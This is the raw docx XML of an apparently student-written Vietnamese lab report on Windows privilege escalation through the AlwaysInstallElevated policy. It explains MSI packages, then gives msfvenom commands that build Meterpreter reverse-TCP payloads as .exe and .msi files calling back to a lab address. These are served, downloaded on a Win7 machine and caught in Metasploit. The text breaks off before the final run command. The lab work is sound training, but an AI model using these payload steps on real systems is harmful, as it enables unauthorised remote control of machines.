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1E40" w14:textId="2AE7A561" w:rsidR="00500A9A" w:rsidRDefault="00500A9A" w:rsidP="00500A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VILEGE ESCALATION LAB</w:t>
      </w:r>
      <w:r w:rsidR="003523F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (WINDOWS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EAE606" w14:textId="38345AA7" w:rsidR="00500A9A" w:rsidRPr="00542C9D" w:rsidRDefault="000E254C" w:rsidP="00500A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2C9D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>I. Windows Privilege Escalation (AlwaysInstallElevated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B869115" w14:textId="70289042" w:rsidR="000E254C" w:rsidRDefault="000E254C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AlwaysInstallElevated</w:t>
      </w:r>
      <w:r w:rsidR="00D31127">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Policy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08FC661" w14:textId="32A10B44" w:rsidR="000E254C" w:rsidRDefault="000E254C" w:rsidP="00500A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Windows có sẵn công cụ Window Installer được MSI packages sử dụng để cài đặt ứng dụng. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D31127">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">MSI </w:t>
      </w:r>
      <w:r w:rsidR="00D31127" w:rsidRPr="00D31127">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>packages</w:t>
      </w:r>
      <w:r w:rsidR="00D31127">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> có thể được </w:t>
      </w:r>
      <w:r w:rsidR="00D31127" w:rsidRPr="00D31127">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cài đặt với đặc quyền nâng cao</w:t>
      </w:r>
      <w:r w:rsidR="00D31127">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> cho </w:t>
      </w:r>
      <w:r w:rsidR="00D31127" w:rsidRPr="00D31127">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>người dùng không phải quản trị viên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C163B0" w14:textId="3840535E" w:rsidR="00D31127" w:rsidRDefault="00D31127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AlwaysInstallElevated Policy được sử dụng để cài đặt MSI packages với các đặc quyền (hệ thống) nâng cao </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CAFC9E" w14:textId="2302B260" w:rsidR="00542C9D" w:rsidRDefault="00542C9D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MSI Packages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3981DCF9" w14:textId="3A02B739" w:rsidR="00542C9D" w:rsidRDefault="00542C9D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+ File MSI (Microsoft Software Installer):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193985E7" w14:textId="65511DE6" w:rsidR="00542C9D" w:rsidRDefault="00542C9D" w:rsidP="00542C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 định dạng Windows Installer của Windows để cấu hình các gói cài đặt (các ứng dụng Windows/ các gói cập nhật)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FD9D47" w14:textId="77777777" w:rsidR="00B130A1" w:rsidRDefault="00FB4D63" w:rsidP="00542C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I file extension được sử dụng để cài đặt phần mềm trên Windows.</w:t>
      </w:r>
      <w:r w:rsidR="00B130A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Có thể được sử dụng để cài đặt, gỡ cài đặt, cấu hình và cập nhật các chương trình trên máy tính</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F4E076" w14:textId="709E88E7" w:rsidR="00542C9D" w:rsidRPr="00542C9D" w:rsidRDefault="00B130A1" w:rsidP="00542C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gói phần mềm có thể được cung cấp dưới 2 định dang .msi và .exe</w:t>
      </w:r>
      <w:r w:rsidR="00120C93">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Chúng khác nhau ở chương trình thực chúng)</w:t>
      </w:r>
      <w:r w:rsidR="00FB4D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EC4E8" w14:textId="43E4B499" w:rsidR="00D31127" w:rsidRDefault="00D31127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Chính sách này được kích hoạt trong Local Group Policy editor </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673A075E" w14:textId="37F133E4" w:rsidR="00D31127" w:rsidRDefault="00D31127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366510" wp14:editId="6E06363F">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1" name="Picture 1" descr="A computer screen with a whit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with a white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60714B" w14:textId="224563D2" w:rsidR="00D31127" w:rsidRDefault="00D31127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minh họa)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1341DC" w14:textId="57B880C5" w:rsidR="00D31127" w:rsidRDefault="00D31127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98651F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Chính sách này chỉ đạo công cụ Windows Installer sử dụng các quyền nâng cao khi cài đặt bất kỳ chương trình nào trên hệ thống =&gt; máy dễ bị tấn công =&gt; Leo thang đặc quyền </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C30E4F3" w14:textId="5ACC20E2" w:rsidR="0098651F" w:rsidRDefault="0098651F" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64165970" w14:textId="30A56A62" w:rsidR="0098651F" w:rsidRDefault="0098651F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Cấu hình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EF1029" w14:textId="13062ABB" w:rsidR="003C3BAE" w:rsidRDefault="003C3BAE" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3B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2DDBD4" wp14:editId="245734AD">
            <wp:extent cx="4486901" cy="2657846"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="2" name="Picture 2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error messag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0D51" w14:textId="722F9DF5" w:rsidR="003C3BAE" w:rsidRDefault="003C3BAE" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3B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FD6D3B" wp14:editId="41678DF9">
            <wp:extent cx="5943600" cy="4166870"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="3" name="Picture 3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BCFC" w14:textId="2A211AA2" w:rsidR="003C3BAE" w:rsidRDefault="003C3BAE" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3B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09E7D" wp14:editId="39A87265">
            <wp:extent cx="5943600" cy="3502660"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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9563" w14:textId="1EC82781" w:rsidR="001A7B7E" w:rsidRDefault="001A7B7E" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FA03116" w14:textId="2F3868CD" w:rsidR="008B2AC6" w:rsidRDefault="008B2AC6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Khai thác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221943FC" w14:textId="519E5DCC" w:rsidR="008B2AC6" w:rsidRPr="00D00E86" w:rsidRDefault="008B2AC6" w:rsidP="00500A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0E8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I. Leo thang thông qua .msi payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ACE4DB" w14:textId="696F4C9C" w:rsidR="001E4722" w:rsidRDefault="001E4722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Lấy phiên của người dùng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDAFD3F" w14:textId="640747B9" w:rsidR="001E4722" w:rsidRDefault="001E4722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Người dùng của máy Win7- Thinh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44165236" w14:textId="06577FB1" w:rsidR="001E4722" w:rsidRDefault="001E4722" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E47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742345" wp14:editId="3A79DF37">
            <wp:extent cx="4810796" cy="5591955"/>
            <wp:effectExtent l="0" t="0" r="8890" b="8890"/>
            <wp:docPr id="5" name="Picture 5" descr="A screenshot of a comput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menu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69F6" w14:textId="5B594E48" w:rsidR="001E4722" w:rsidRDefault="001E4722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Lấy phiên:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F1EEB6" w14:textId="0DC6547C" w:rsidR="001E4722" w:rsidRPr="007D0158" w:rsidRDefault="001E4722" w:rsidP="00500A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0158">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">B1: </w:t>
      </w:r>
      <w:r w:rsidR="001A7B7E" w:rsidRPr="007D0158">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidR="00A246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7B7E" w:rsidRPr="007D0158">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4FC37A" w14:textId="5B3A524C" w:rsidR="008B2AC6" w:rsidRDefault="00A246B2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1A7B7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Sử dụng lệnh</w:t>
      </w:r>
      <w:r w:rsidR="008B2AC6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="000A4A79" w:rsidRPr="000A4A79">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.64.147 LPORT=8080 -f exe -o /root/file.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67741B87" w14:textId="3BDB780C" w:rsidR="00904319" w:rsidRDefault="00904319" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009043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9929AA" wp14:editId="5230183B">
            <wp:extent cx="5943600" cy="974725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10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8EA4" w14:textId="460E6943" w:rsidR="000A4A79" w:rsidRDefault="000A4A79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File .exe được</w:t>
      </w:r>
      <w:r w:rsidR="00904319">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> tạo dựa trên payload windows/meterpreter/reverse_tcp của Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E1B329" w14:textId="4F303DFC" w:rsidR="00A246B2" w:rsidRDefault="00A246B2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File đã được tạo trong thư mục /root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C6D11B" w14:textId="31E91010" w:rsidR="00A246B2" w:rsidRDefault="000A4A79" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A4A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4E587" wp14:editId="46AC914F">
            <wp:extent cx="5943600" cy="3221355"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9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1379" w14:textId="17E3BDBB" w:rsidR="00904319" w:rsidRDefault="00904319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Cấp quyền 777 cho file.exe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F26D5A" w14:textId="71ABF0F8" w:rsidR="00904319" w:rsidRDefault="00904319" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009043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80A24" wp14:editId="640A13F1">
            <wp:extent cx="1848108" cy="2667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53ED" w14:textId="1DC38CD4" w:rsidR="00904319" w:rsidRDefault="00904319" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009043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FE6054" wp14:editId="46C26E83">
            <wp:extent cx="3953427" cy="1714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62A8" w14:textId="3EAE27AD" w:rsidR="007D0158" w:rsidRDefault="00A246B2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7D0158">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Chuyển file qua thư mục /var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DA6FB1" w14:textId="2C1680B7" w:rsidR="003C3BAE" w:rsidRDefault="007D0158" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D01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03B23C" wp14:editId="07148362">
            <wp:extent cx="5943600" cy="3181350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C03F" w14:textId="2C6033F0" w:rsidR="00904319" w:rsidRDefault="00904319" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="245EBF7D" w14:textId="393FA7C7" w:rsidR="00904319" w:rsidRDefault="00904319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2: Tạo phiên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A14466C" w14:textId="6C4ED319" w:rsidR="00904319" w:rsidRDefault="00904319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ại máy win7, truy cập link: 192.168.64.147/file.exe =&gt; File được download về máy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27054C49" w14:textId="5049C0B7" w:rsidR="00904319" w:rsidRDefault="00904319" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009043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BDC58E" wp14:editId="4C50BC04">
            <wp:extent cx="4525006" cy="7611537"/>
            <wp:effectExtent l="0" t="0" r="9525" b="889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0F76" w14:textId="6DD655A9" w:rsidR="00904319" w:rsidRDefault="00730838" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007308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3A7149" wp14:editId="28E4D544">
            <wp:extent cx="5943600" cy="3080385"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="14" name="Picture 14" descr="A computer screen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omputer screen with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2AEE" w14:textId="2322029F" w:rsidR="00730838" w:rsidRDefault="00730838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ại máy Kali, truy cập Metasploit bằng msfconsole:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACB5FA8" w14:textId="19CBCFB9" w:rsidR="00730838" w:rsidRDefault="00730838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Khai thác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AECB56A" w14:textId="34C49AE1" w:rsidR="00730838" w:rsidRPr="00730838" w:rsidRDefault="00730838" w:rsidP="00730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14:paraId="55079E42" w14:textId="4B57C7C7" w:rsidR="00730838" w:rsidRDefault="00730838" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007308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4956D9" wp14:editId="09959A94">
            <wp:extent cx="4172532" cy="485843"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="15" name="Picture 15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black backgrou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F6FC" w14:textId="2EE5F0B1" w:rsidR="00730838" w:rsidRDefault="00730838" w:rsidP="00730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14:paraId="5D75A2E3" w14:textId="6E41D444" w:rsidR="005C0A22" w:rsidRDefault="005C0A22" w:rsidP="005C0A22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="564"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C0A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8AA823" wp14:editId="44663E0B">
            <wp:extent cx="5943600" cy="4013200"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="17" name="Picture 1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13DC" w14:textId="77777777" w:rsidR="005C0A22" w:rsidRDefault="005C0A22" w:rsidP="005C0A22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="564"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0566964D" w14:textId="77777777" w:rsidR="005C0A22" w:rsidRDefault="005C0A22" w:rsidP="005C0A22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="564"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3463DB93" w14:textId="26D10AB6" w:rsidR="005C0A22" w:rsidRDefault="005C0A22" w:rsidP="005C0A22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="5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14:paraId="3C94B18C" w14:textId="42BD077D" w:rsidR="005C0A22" w:rsidRDefault="005C0A22" w:rsidP="005C0A22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="564"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C0A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75E564" wp14:editId="082E2B5A">
            <wp:extent cx="5943600" cy="3336925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18" name="Picture 18" descr="A computer screen with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omputer screen with a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24D1" w14:textId="2A3B0AF6" w:rsidR="00DB5DC3" w:rsidRDefault="00DB5DC3" w:rsidP="005C0A22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="564"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB5D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E67A89" wp14:editId="48942696">
            <wp:extent cx="5943600" cy="984250"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="19" name="Picture 19" descr="A computer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omputer screen with numbers and letter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3BE9" w14:textId="4124EA7A" w:rsidR="00DB5DC3" w:rsidRDefault="00DB5DC3" w:rsidP="005C0A22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="564"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB5D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B05A5C" wp14:editId="29872861">
            <wp:extent cx="2934109" cy="333422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BDDD" w14:textId="125C56EF" w:rsidR="005C0A22" w:rsidRDefault="00DB5DC3" w:rsidP="00DB5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Leo thang bằng file .msi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7FC25F" w14:textId="5D90B3FD" w:rsidR="00DB5DC3" w:rsidRDefault="00DB5DC3" w:rsidP="00DB5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ạo file 1.msi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1355D099" w14:textId="6CA5BA9D" w:rsidR="00DB5DC3" w:rsidRPr="00DB5DC3" w:rsidRDefault="00DB5DC3" w:rsidP="00DB5D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mand: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB5DC3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.64.147 LPORT=4567 -f msi &gt; /root/1.msi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2189BBA9" w14:textId="250905E9" w:rsidR="00DB5DC3" w:rsidRDefault="00DB5DC3" w:rsidP="00DB5DC3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB5D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4A0E82" wp14:editId="388B92EF">
            <wp:extent cx="5943600" cy="7289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7C15" w14:textId="08C906DF" w:rsidR="00933A84" w:rsidRDefault="00933A84" w:rsidP="00DB5DC3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00933A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1D7D42" wp14:editId="2FC08C09">
            <wp:extent cx="5943600" cy="3300730"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22" name="Picture 2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4512" w14:textId="24B2C067" w:rsidR="00933A84" w:rsidRDefault="00933A84" w:rsidP="00DB5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Upload file 1.msi sang máy win7:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788BECA2" w14:textId="0D56D466" w:rsidR="00933A84" w:rsidRDefault="00933A84" w:rsidP="00DB5DC3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00933A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5EAC0A" wp14:editId="278495C9">
            <wp:extent cx="5943600" cy="1550670"/>
            <wp:effectExtent l="0" t="0" r="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F3F1" w14:textId="77777777" w:rsidR="00933A84" w:rsidRDefault="00933A84" w:rsidP="00DB5DC3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BF0BE68" w14:textId="302056CC" w:rsidR="00933A84" w:rsidRDefault="00933A84" w:rsidP="00DB5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Set up</w:t>
      </w:r>
      <w:r w:rsidR="00F445C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF278C1" w14:textId="63AE969D" w:rsidR="00F445C0" w:rsidRDefault="00F445C0" w:rsidP="00DB5DC3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F445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537763" wp14:editId="31E215FA">
            <wp:extent cx="5943600" cy="3952240"/>
            <wp:effectExtent l="0" t="0" r="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0251" w14:textId="77777777" w:rsidR="00F445C0" w:rsidRPr="00DB5DC3" w:rsidRDefault="00F445C0" w:rsidP="00DB5DC3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71CB99BC" w14:textId="4F7DEAE4" w:rsidR="00904319" w:rsidRDefault="00933A84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hực thi</w:t>
      </w:r>
      <w:r w:rsidR="00F445C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> đồng thời payload trên Metasploit và</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> file 1.msi trên máy windows bằng câu lệnh: </w:t>
      </w:r>
    </w:p>
